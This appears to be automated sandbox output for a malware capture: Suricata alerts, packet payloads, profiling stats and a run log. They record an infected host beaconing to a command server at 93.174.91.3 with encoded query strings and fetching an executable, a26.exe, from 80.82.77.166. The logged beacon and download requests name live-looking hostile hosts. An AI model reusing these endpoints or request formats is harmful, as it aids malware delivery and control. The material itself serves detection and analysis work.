{"timestamp":"2017-05-03T18:40:54.664529+0000","flow_id":1501396618889578,"pcap_cnt":48,"event_type":"fileinfo","src_ip":"93.174.91.3","src_port":80,"dest_ip":"192.168.56.19","dest_port":55948,"proto":"TCP","http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9WRnBzWlVoNGRWcFlWakJqYlRsMVdETk9NRmxZU1QwPQ==","http_user_agent":"DMFR","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":16},"app_proto":"http","fileinfo":{"filename":"\/classes\/s.php","gaps":false,"state":"CLOSED","stored":false,"size":16,"tx_id":2}}
{"timestamp":"2017-05-03T18:40:54.863994+0000","flow_id":1501396618889578,"pcap_cnt":49,"event_type":"alert","src_ip":"192.168.56.19","src_port":55948,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":3,"alert":{"action":"allowed","gid":1,"signature_id":2806027,"rev":3,"signature":"ETPRO TROJAN Win32\/Aybo.A Checkin","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2017-05-03T18:40:54.863994+0000","flow_id":1501396618889578,"pcap_cnt":49,"event_type":"http","src_ip":"192.168.56.19","src_port":55948,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9WRnBzWlVoNGRWcFlWakJqYlRsMVdETk9NRmxZU1QwPQ==","http_user_agent":"DMFR","http_content_type":"text\/html"}}
{"timestamp":"2017-05-03T18:41:14.705685+0000","flow_id":1501396618889578,"pcap_cnt":51,"event_type":"fileinfo","src_ip":"93.174.91.3","src_port":80,"dest_ip":"192.168.56.19","dest_port":55948,"proto":"TCP","http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9WRnBzWlVoNGRWcFlWakJqYlRsMVdETk9NRmxZU1QwPQ==","http_user_agent":"DMFR","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":16},"app_proto":"http","fileinfo":{"filename":"\/classes\/s.php","gaps":false,"state":"CLOSED","stored":false,"size":16,"tx_id":3}}
{"timestamp":"2017-05-03T18:41:14.754072+0000","flow_id":2170818814210073,"pcap_cnt":61,"event_type":"alert","src_ip":"192.168.56.19","src_port":55950,"dest_ip":"80.82.77.166","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2016141,"rev":5,"signature":"ET INFO Executable Download from dotted-quad Host","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2017-05-03T18:41:14.754072+0000","flow_id":2170818814210073,"pcap_cnt":61,"event_type":"alert","src_ip":"192.168.56.19","src_port":55950,"dest_ip":"80.82.77.166","dest_port":80,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2020826,"rev":7,"signature":"ET CURRENT_EVENTS Potential Dridex.Maldoc Minimal Executable Request","category":"A Network Trojan was detected","severity":1}}
{"timestamp":"2017-05-03T18:41:14.769013+0000","flow_id":2170818814210073,"pcap_cnt":86,"event_type":"alert","src_ip":"80.82.77.166","src_port":80,"dest_ip":"192.168.56.19","dest_port":55950,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2018959,"rev":3,"signature":"ET POLICY PE EXE or DLL Windows file download HTTP","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"2017-05-03T18:41:14.769013+0000","flow_id":2170818814210073,"pcap_cnt":86,"event_type":"alert","src_ip":"80.82.77.166","src_port":80,"dest_ip":"192.168.56.19","dest_port":55950,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2021076,"rev":2,"signature":"ET INFO SUSPICIOUS Dotted Quad Host MZ Response","category":"Potentially Bad Traffic","severity":2}}
{"timestamp":"2017-05-03T18:41:14.963605+0000","flow_id":1501396618889578,"pcap_cnt":192,"event_type":"alert","src_ip":"192.168.56.19","src_port":55948,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":4,"alert":{"action":"allowed","gid":1,"signature_id":2806027,"rev":3,"signature":"ETPRO TROJAN Win32\/Aybo.A Checkin","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2017-05-03T18:41:14.963605+0000","flow_id":1501396618889578,"pcap_cnt":192,"event_type":"http","src_ip":"192.168.56.19","src_port":55948,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9WRnBzWlVoNGRWcFlWakJqYlRsMVdETk9NRmxZU1QwPQ==","http_user_agent":"DMFR","http_content_type":"text\/html"}}
{"timestamp":"2017-05-03T18:41:17.934516+0000","flow_id":2170818814210073,"pcap_cnt":2452,"event_type":"http","src_ip":"192.168.56.19","src_port":55950,"dest_ip":"80.82.77.166","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"80.82.77.166","url":"\/classes\/a26.exe","http_user_agent":"explorer","http_content_type":"application\/octet-stream"}}
{"timestamp":"2017-05-03T18:42:10.414096+0000","flow_id":1564358698231754,"pcap_cnt":2472,"event_type":"alert","src_ip":"192.168.56.19","src_port":55951,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2806027,"rev":3,"signature":"ETPRO TROJAN Win32\/Aybo.A Checkin","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2017-05-03T18:42:10.414096+0000","flow_id":1564358698231754,"pcap_cnt":2472,"event_type":"http","src_ip":"192.168.56.19","src_port":55951,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=WXpKV2VtTXliSFppYm5kNlQxUk5NVTFVUWpoT1ZGRjRUWGM5UFE9PQ==","http_user_agent":"DMFR","http_content_type":"text\/html"}}
{"timestamp":"2017-05-03T18:42:10.691785+0000","flow_id":1564358698231754,"pcap_cnt":2474,"event_type":"fileinfo","src_ip":"93.174.91.3","src_port":80,"dest_ip":"192.168.56.19","dest_port":55951,"proto":"TCP","http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=WXpKV2VtTXliSFppYm5kNlQxUk5NVTFVUWpoT1ZGRjRUWGM5UFE9PQ==","http_user_agent":"DMFR","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":80},"app_proto":"http","fileinfo":{"filename":"\/classes\/s.php","gaps":false,"state":"CLOSED","stored":false,"size":80,"tx_id":0}}
{"timestamp":"2017-05-03T18:42:10.983439+0000","flow_id":1564358698231754,"pcap_cnt":2475,"event_type":"alert","src_ip":"192.168.56.19","src_port":55951,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":1,"alert":{"action":"allowed","gid":1,"signature_id":2806027,"rev":3,"signature":"ETPRO TROJAN Win32\/Aybo.A Checkin","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2017-05-03T18:42:10.983439+0000","flow_id":1564358698231754,"pcap_cnt":2475,"event_type":"http","src_ip":"192.168.56.19","src_port":55951,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9iVlkwWmtjMWJHUllVbmxpTWpWbVl6TlNhR05uUFQwPQ==","http_user_agent":"DMFR","http_content_type":"text\/html"}}
{"timestamp":"2017-05-03T18:42:30.763629+0000","flow_id":1564358698231754,"pcap_cnt":2479,"event_type":"fileinfo","src_ip":"93.174.91.3","src_port":80,"dest_ip":"192.168.56.19","dest_port":55951,"proto":"TCP","http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9iVlkwWmtjMWJHUllVbmxpTWpWbVl6TlNhR05uUFQwPQ==","http_user_agent":"DMFR","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":16},"app_proto":"http","fileinfo":{"filename":"\/classes\/s.php","gaps":false,"state":"CLOSED","stored":false,"size":16,"tx_id":1}}
{"timestamp":"2017-05-03T18:42:30.962161+0000","flow_id":1564358698231754,"pcap_cnt":2480,"event_type":"alert","src_ip":"192.168.56.19","src_port":55951,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":2,"alert":{"action":"allowed","gid":1,"signature_id":2806027,"rev":3,"signature":"ETPRO TROJAN Win32\/Aybo.A Checkin","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2017-05-03T18:42:30.962161+0000","flow_id":1564358698231754,"pcap_cnt":2480,"event_type":"http","src_ip":"192.168.56.19","src_port":55951,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9iVlkwWmtjMWJHUllVbmxpTWpWbVl6TlNhR05uUFQwPQ==","http_user_agent":"DMFR","http_content_type":"text\/html"}}
{"timestamp":"2017-05-03T18:42:50.818718+0000","flow_id":1564358698231754,"pcap_cnt":2485,"event_type":"fileinfo","src_ip":"93.174.91.3","src_port":80,"dest_ip":"192.168.56.19","dest_port":55951,"proto":"TCP","http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9iVlkwWmtjMWJHUllVbmxpTWpWbVl6TlNhR05uUFQwPQ==","http_user_agent":"DMFR","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":16},"app_proto":"http","fileinfo":{"filename":"\/classes\/s.php","gaps":false,"state":"CLOSED","stored":false,"size":16,"tx_id":2}}
{"timestamp":"2017-05-03T18:42:51.021004+0000","flow_id":1564358698231754,"pcap_cnt":2486,"event_type":"alert","src_ip":"192.168.56.19","src_port":55951,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":3,"alert":{"action":"allowed","gid":1,"signature_id":2806027,"rev":3,"signature":"ETPRO TROJAN Win32\/Aybo.A Checkin","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2017-05-03T18:42:51.021004+0000","flow_id":1564358698231754,"pcap_cnt":2486,"event_type":"http

This file has been truncated.


unified2.alert.1574428638 - (15900 bytes)
(unified2 is a binary alert and packet format; its record headers are not printable. Only the captured HTTP payload of each record is reproduced below, in file order.)

Record 1 packet payload (192.168.56.19 -> 93.174.91.3):
GET /classes/s.php?query=WXpKV2VtTXliSFppYm5kM1prUkZNMDFVVFQwPQ== HTTP/1.1
Accept: text/*
Content-Type: application/x-www-form-urlencoded
User-Agent: DMFR
Host: 93.174.91.3
Cache-Control: no-cache

Record 2 packet payload (192.168.56.19 -> 93.174.91.3):
GET /classes/s.php?query=WTIxV2JtRllUakJhV0VvNFVWaHNhRmx0T1RCbVJGRjNVMFpDTTFwR1VsVlhWMDQ0VTFjMU1GcFhkMnhOYW1oVFNsUkpOVXN4YUd4aU1qUnNUV3BvVTBwVVNUVkxNRTVSVmxOMFJrNVRNSGxPYW1kM1N6TlpNRXQ1VlRCTlEzTjVUR3BSZDFJd2FEWkxlVEJ5VFZSQk1FNVRkRTVUU0c5eVMzbHplVTFFVVROVVZVbHlTM2x6ZDFwRGMzaGhRM042WWxOemVVMXVUWEpMZVhSWVlWYzBNMHQ1YzNKV1ZrNUNaa1JLT0UxNlNqaFdiV3g1WkVoV2FHSkZTblpsUTBKSVkyMUdkMkZIYkdwamVVSkNXa2RHZDJSSFZuaz0= HTTP/1.1
Accept: text/*
Content-Type: application/x-www-form-urlencoded
User-Agent: DMFR
Host: 93.174.91.3
Cache-Control: no-cache

Record 3 packet payload (192.168.56.19 -> 93.174.91.3):
GET /classes/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9WRnBzWlVoNGRWcFlWakJqYlRsMVdETk9NRmxZU1QwPQ== HTTP/1.1
Accept: text/*
Content-Type: application/x-www-form-urlencoded
User-Agent: DMFR
Host: 93.174.91.3
Cache-Control: no-cache

Record 4 packet payload (192.168.56.19 -> 93.174.91.3):
GET /classes/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9WRnBzWlVoNGRWcFlWakJqYlRsMVdETk9NRmxZU1QwPQ== HTTP/1.1
Accept: text/*
Content-Type: application/x-www-form-urlencoded
User-Agent: DMFR
Host: 93.174.91.3
Cache-Control: no-cache

Record 5 packet payload (192.168.56.19 -> 80.82.77.166):
GET /classes/a26.exe HTTP/1.1
User-Agent: explorer
Host: 80.82.77.166

Record 6 packet payload (192.168.56.19 -> 80.82.77.166; the same request, logged again for the second alert that fired on it):
GET /classes/a26.exe HTTP/1.1
User-Agent: explorer
Host: 80.82.77.166

Record 7 packet payload (80.82.77.166 -> 192.168.56.19):
[binary data: the HTTP response carrying the executable served as /classes/a26.exe (the packet the "MZ Response" and "PE EXE or DLL" alerts fired on). Printable strings visible in the dump include MSWHEEL_ROLLMSG, MSH_WHEELSUPPORT_MSG, TFileName, TSearchRec and exception class names such as EHeapException, EOutOfMemory, EInOutError, EAccessViolation and EStackOverflow.]

Record 8 packet payload (80.82.77.166 -> 192.168.56.19):
[binary data: the same payload as record 7, logged again for the second alert that fired on that packet.]

Record 9 packet payload (192.168.56.19 -> 93.174.91.3):
GET /classes/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9WRnBzWlVoNGRWcFlWakJqYlRsMVdETk9NRmxZU1QwPQ== HTTP/1.1
Accept: text/*
Content-Type: application/x-www-form-urlencoded
User-Agent: DMFR
Host: 93.174.91.3
Cache-Control: no-cache

Record 10 packet payload (192.168.56.19 -> 93.174.91.3):
GET /classes/s.php?query=WXpKV2VtTXliSFppYm5kNlQxUk5NVTFVUWpoT1ZGRjRUWGM5UFE9PQ== HTTP/1.1
Accept: text/*
Content-Type: application/x-www-form-urlencoded
User-Agent: DMFR
Host: 93.174.91.3
Cache-Control: no-cache

Records 11 through 18 packet payload (192.168.56.19 -> 93.174.91.3; eight separate records, each carrying this identical request):
GET /classes/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9iVlkwWmtjMWJHUllVbmxpTWpWbVl6TlNhR05uUFQwPQ== HTTP/1.1
Accept: text/*
Content-Type: application/x-www-form-urlencoded
User-Agent: DMFR
Host: 93.174.91.3
Cache-Control: no-cache


keyword_perf.log - (14389 bytes)
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 11/22/2019 -- 13:17:20
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             25320910        4729            4729            136508          5354.00         5354.00         0.00           
  content          97692396        4684            1908            340414          20856.00        21494.00        20418.00       
  pcre             14906350        667             86              9224232         22348.00        9807.00         24204.00       
  byte_test        5291824         933             251             95766           5671.00         5702.00         5660.00        
  byte_jump        373924          68              62              20096           5498.00         5568.00         4779.00        
  isdataat         18766           4               1               4986            4691.00         4526.00         4746.00        
  flowbits         9597418         1879            49              70346           5107.00         6158.00         5079.00        
  urilen           1731406         301             218             88534           5752.00         5484.00         6455.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             25320910        4729            4729            136508          5354.00         5354.00         0.00           
  flowbits         9456794         1862            32              70346           5078.00         5036.00         5079.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          43866320        1544            496             340414          28410.00        39224.00        23292.00       
  pcre             334150          30              3               54830           11138.00        30259.00        9013.00        
  byte_test        5099804         891             251             95766           5723.00         5702.00         5731.00        
  byte_jump        105698          20              14              13428           5284.00         5501.00         4779.00        
  isdataat         18766           4               1               4986            4691.00         4526.00         4746.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         140624          17              17              21966           8272.00         8272.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          5610180         933             711             33402           6013.00         5931.00         6274.00        
  pcre             13063618        449             65              9224232         29094.00        8985.00         32498.00       
  urilen           1731406         301             218             88534           5752.00         5484.00         6455.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_request_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          13242           2               2               8620            6621.00         6621.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          87798           16              0               10208           5487.00         0.00            5487.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          42912600        1271            243             250684          33762.00        60431.00        27458.00       
  pcre             1132734         151             0               30956           7501.00         0.00            7501.00        
  byte_test        192020          42              0               4942            4571.00         0.00            4571.00        
  byte_jump        268226          48              48              20096           5588.00         5588.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3462094         593             307             29402           5838.00         5940.00         5728.00        
  pcre             298678          34              17              23030           8784.00         8582.00         8986.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          386184          69              52              8412            5596.00         5497.00         5902.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_type
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          245408          44              43              8118            5577.00         5579.00         5476.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_raw_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          6878            1               0               6878            6878.00         0.00            6878.00        
  pcre             29522           1               0               29522           29522.00        0.00            29522.00       
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          896106          174             46              20006           5150.00         5357.00         5075.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          5198            1               1               5198            5198.00         5198.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          27272           5               5               6250            5454.00         5454.00         0.00           
  pcre             47648           2               1               24964           23824.00        22684.00        24964.00       
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_msg
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          5294            1               0               5294            5294.00         0.00            5294.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          167822          30              2               20598           5594.00         6038.00         5562.00        


suricata-report-2019-11-22-T-13-17-20-11222019.1316-75eabd849a48ce317345ba33dfe57943800a1e0e37f64d6e162759b3334180a9_network.pcap.txt - (18106 bytes)
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/bc723fab22ff6f9155158c04712f3dbe56b33745cb75ec8c950e11a498e082d2 -r /var/pcap/11222019.1316-75eabd849a48ce317345ba33dfe57943800a1e0e37f64d6e162759b3334180a9_network.pcap -vvv -k none
elapsedtime:26.929215
stderr:
stdout:
22/11/2019 -- 13:16:53 - <Info> - Configuration node 'rule-files' redefined.
22/11/2019 -- 13:16:53 - <Notice> - This is Suricata version 4.0.0 RELEASE
22/11/2019 -- 13:16:53 - <Info> - CPUs/cores online: 1
22/11/2019 -- 13:16:53 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 33633 and 'request-body-inspect-window' set to 16399 after randomization.
22/11/2019 -- 13:16:53 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 31366 and 'response-body-inspect-window' set to 16035 after randomization.
22/11/2019 -- 13:16:53 - <Config> - DNS request flood protection level: 500
22/11/2019 -- 13:16:53 - <Config> - DNS per flow memcap (state-memcap): 524288
22/11/2019 -- 13:16:53 - <Config> - DNS global memcap: 16777216
22/11/2019 -- 13:16:53 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
22/11/2019 -- 13:16:53 - <Config> - preallocated 1000 hosts of size 136
22/11/2019 -- 13:16:53 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
22/11/2019 -- 13:16:53 - <Config> - using magic-file /usr/share/file/magic
22/11/2019 -- 13:16:53 - <Config> - Core dump size is unlimited.
22/11/2019 -- 13:16:53 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
22/11/2019 -- 13:16:53 - <Config> - preallocated 1000 defrag trackers of size 168
22/11/2019 -- 13:16:53 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
22/11/2019 -- 13:16:53 - <Config> - stream "prealloc-sessions": 2048 (per thread)
22/11/2019 -- 13:16:53 - <Config> - stream "memcap": 33554432
22/11/2019 -- 13:16:53 - <Config> - stream "midstream" session pickups: disabled
22/11/2019 -- 13:16:53 - <Config> - stream "async-oneside": disabled
22/11/2019 -- 13:16:53 - <Config> - stream "checksum-validation": disabled
22/11/2019 -- 13:16:53 - <Config> - stream."inline": disabled
22/11/2019 -- 13:16:53 - <Config> - stream "bypass": disabled
22/11/2019 -- 13:16:53 - <Config> - stream "max-synack-queued": 5
22/11/2019 -- 13:16:53 - <Config> - stream.reassembly "memcap": 134217728
22/11/2019 -- 13:16:53 - <Config> - stream.reassembly "depth": 0
22/11/2019 -- 13:16:53 - <Config> - stream.reassembly "toserver-chunk-size": 2513
22/11/2019 -- 13:16:53 - <Config> - stream.reassembly "toclient-chunk-size": 2523
22/11/2019 -- 13:16:53 - <Config> - stream.reassembly.raw: enabled
22/11/2019 -- 13:16:53 - <Config> - stream.reassembly "segment-prealloc": 2048
22/11/2019 -- 13:16:53 - <Config> - Delayed detect disabled
22/11/2019 -- 13:16:53 - <Config> - pattern matchers: MPM: ac, SPM: bm
22/11/2019 -- 13:16:53 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
22/11/2019 -- 13:16:53 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
22/11/2019 -- 13:16:53 - <Config> - prefilter engines: MPM
22/11/2019 -- 13:16:53 - <Config> - IP reputation disabled
22/11/2019 -- 13:16:53 - <Perf> - Registered 148 keyword profiling counters.
22/11/2019 -- 13:16:53 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
22/11/2019 -- 13:16:53 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
22/11/2019 -- 13:16:53 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
22/11/2019 -- 13:16:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
22/11/2019 -- 13:16:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
22/11/2019 -- 13:16:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
22/11/2019 -- 13:16:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
22/11/2019 -- 13:16:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
22/11/2019 -- 13:16:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
22/11/2019 -- 13:16:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
22/11/2019 -- 13:16:58 - <Config> - No rules loaded from ET-icmp.rules.
22/11/2019 -- 13:16:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
22/11/2019 -- 13:16:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
22/11/2019 -- 13:16:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
22/11/2019 -- 13:16:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
22/11/2019 -- 13:16:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
22/11/2019 -- 13:16:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
22/11/2019 -- 13:16:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
22/11/2019 -- 13:16:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
22/11/2019 -- 13:16:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
22/11/2019 -- 13:16:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
22/11/2019 -- 13:17:02 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
22/11/2019 -- 13:17:02 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
22/11/2019 -- 13:17:02 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
22/11/2019 -- 13:17:04 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
22/11/2019 -- 13:17:04 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
22/11/2019 -- 13:17:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
22/11/2019 -- 13:17:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
22/11/2019 -- 13:17:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
22/11/2019 -- 13:17:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
22/11/2019 -- 13:17:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
22/11/2019 -- 13:17:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
22/11/2019 -- 13:17:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
